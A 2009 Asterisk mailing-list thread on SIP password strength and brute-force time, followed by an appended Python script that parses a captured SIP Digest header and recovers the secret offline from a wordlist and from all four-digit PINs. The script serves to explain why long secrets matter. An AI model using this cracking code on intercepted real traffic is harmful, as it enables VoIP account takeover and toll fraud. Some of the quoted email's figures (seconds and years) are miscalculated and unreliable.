Very insightful, thank you Bret. Barring packet sniffing (which can only be done along the route right?) more secure passwords would make a real difference. Here is a question - has anyone on the list had an account hacked where the password wasn't stupid (where stupid=(1234,1111,secret,${EXTEN}, etc))? My thought is, the botnets are probably looking for low hanging fruit. I'd love to know if anyone has evidence that that isn't the case. Andy
Trixter aka Bret McDanel wrote:

On Tue, 2009-03-10 at 16:14 -0400, Andrew M. Lauppe wrote:
> We discussed this on freenode #freepbx today, and someone did the following math.
> A 20 digit numerical password/secret (numerical meaning only 0-9 - obviously), attacked via brute force at 5,000,000 passwords per second, would take more than 600,000+ years to crack. I didn't verify but it looks about right.

20 digit is 100,000,000,000,000,000,000 combinations assuming that there are no blacklisted ones in that space. 100,000,000,000,000 seconds at 5M/sec (for reference, about what the total US debt is including social security and other things that normally don't show on the national debt numbers). About 3.1M years for an exhaustive search; statistically speaking it would be half that time on average if you are doing multiple, or about 1.6M years. If the password is alphanumeric then it goes from 100 million trillion to 13,367,495,000,000,000,000,000,000,000,000 or 13,367 trillion trillion, and I am not even going into case sensitivity or other characters that could be used. If you just used upper case letters and numbers, 10 characters would be about 23 years @ 5M/sec for an exhaustive search. 12 would be 30k years. See below about how this time could be shortened.

> Lesson of the day? Sure, more secure passwords aren't THE solution, but they sure help. I'm pretty sure any attempt to brute force a SIP password on an asterisk box at anything approaching 5 million passwords per second would have side effects that would bring the attack to your attention (like bringing your SIP stack to its knees perhaps?)

It depends on how they are doing it. Brute forcing *can* be via captured packets; everything needed to get the password is in the auth packets in SIP.
There are a lot of different ways to get the hashes; they may be able to get the hash without really doing much else, or they may be in a position to do much more evil things.

> With most phones being auto-provisioned, the length of the password shouldn't be a limiting factor. Make your passwords/secrets more complex and we can be done with this conversation. Please.

Well, it is MD5 in SIP, so the 5M/sec doesn't really hold if they are doing it on a botnet or similar that is outside your control via captured headers. Of course stopping people from capturing headers is beyond the scope of a packet filtering system.
_______________________________________________ --Bandwidth and Colocation Provided by http://www.api-digital.com-- asterisk-biz mailing list To UNSUBSCRIBE or update options visit: http://lists.digium.com/mailman/listinfo/asterisk-biz
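The two points in Bret's reply (the keyspace arithmetic at 5M guesses/sec, and the fact that a captured SIP Digest exchange can be attacked offline, where the PBX imposes no rate limit at all) can be shown in a few lines. The following is an added example written for this page, not code from the thread or from Asterisk; the realm, nonce, host, extension and secret are made-up sample values, and the Digest form is RFC 2617 without qop.

```python
import hashlib
import itertools
import re
import string

SECONDS_PER_YEAR = 365.25 * 86400


def years_to_exhaust(alphabet_size, length, guesses_per_second):
    """Years to try every secret of the given length over the given alphabet
    at a fixed guess rate. The average time to a hit is half of this."""
    return alphabet_size ** length / guesses_per_second / SECONDS_PER_YEAR


def digest_response(username, realm, password, method, uri, nonce):
    """RFC 2617 Digest with no qop:
    response = MD5(MD5(user:realm:pass):nonce:MD5(method:uri))."""
    ha1 = hashlib.md5(f"{username}:{realm}:{password}".encode()).hexdigest()
    ha2 = hashlib.md5(f"{method}:{uri}".encode()).hexdigest()
    return hashlib.md5(f"{ha1}:{nonce}:{ha2}".encode()).hexdigest()


def parse_digest(header):
    """Collect the key="value" / key=value parameters of a Digest header."""
    params = {}
    for key, quoted, bare in re.findall(r'(\w+)=(?:"([^"]*)"|([^,\s]+))', header):
        params[key] = quoted or bare
    return params


def phone_register(username, secret, www_authenticate, uri, method="REGISTER"):
    """What the phone sends back after the 401. The secret never crosses the
    wire in the clear, but everything else needed to test a guess does."""
    ch = parse_digest(www_authenticate)
    resp = digest_response(username, ch["realm"], secret, method, uri, ch["nonce"])
    return (f'Authorization: Digest username="{username}", realm="{ch["realm"]}", '
            f'nonce="{ch["nonce"]}", uri="{uri}", response="{resp}", algorithm=MD5')


def crack_digest(authorization, method, candidates):
    """Offline attack on a captured Authorization header: recompute the
    response for each candidate secret and compare. No packets go to the
    PBX, so nothing on the Asterisk side throttles, logs or notices this."""
    p = parse_digest(authorization)
    for pw in candidates:
        if digest_response(p["username"], p["realm"], pw, method, p["uri"], p["nonce"]) == p["response"]:
            return pw
    return None


def numeric_pins(length):
    """Every all-digit secret of the given length (the 'stupid' keyspace)."""
    for digits in itertools.product(string.digits, repeat=length):
        yield "".join(digits)


# Constructed sample exchange; realm, nonce, host, extension and secret are made up.
CHALLENGE = 'WWW-Authenticate: Digest algorithm=MD5, realm="asterisk", nonce="5d8b2c1e4f"'
CAPTURED_AUTH = phone_register("201", "1234", CHALLENGE, "sip:pbx.example.com")


if __name__ == "__main__":
    for alphabet, length in [(10, 20), (36, 10), (36, 12)]:
        years = years_to_exhaust(alphabet, length, 5e6)
        print(f"{alphabet}^{length} secrets at 5M/s: {years:,.0f} years to exhaust")
    print(CAPTURED_AUTH)
    print("wordlist:", crack_digest(CAPTURED_AUTH, "REGISTER", ["secret", "201", "password"]))
    print("4-digit PINs:", crack_digest(CAPTURED_AUTH, "REGISTER", numeric_pins(4)))
```

Run stand-alone, the keyspace figures come out at roughly 634,000 years for 10^20 numeric secrets, 23 years for 10 alphanumeric (36-symbol) characters and 30,000 years for 12, which is the arithmetic behind the numbers quoted in the thread; the captured-header attack then recovers the four-digit secret from the single Authorization line with no further traffic to the PBX. The 5M/sec figure is only a property of the attacker's hardware once the exchange has been captured, which is why the thread's advice of long, random, auto-provisioned secrets is the part that actually moves the cost.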